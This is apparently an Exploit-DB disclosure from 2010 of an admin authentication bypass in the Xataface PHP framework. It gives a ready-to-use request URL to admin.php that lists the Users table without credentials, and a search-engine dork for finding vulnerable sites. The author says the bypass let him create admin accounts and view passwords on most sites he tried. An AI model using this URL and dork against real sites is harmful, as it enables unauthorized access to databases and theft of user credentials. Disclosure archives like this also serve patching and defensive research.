Xataface - Admin Authentication Bypass

EDB-ID:

11852

CVE:

N/A

Author:

Xinapse

Type:

webapps

Platform:

PHP

Published:

2010-03-23

=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : admin@firewire-security.com

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.




#[+] Greetz        :firewire-security team, b10h4z4rd, g3org3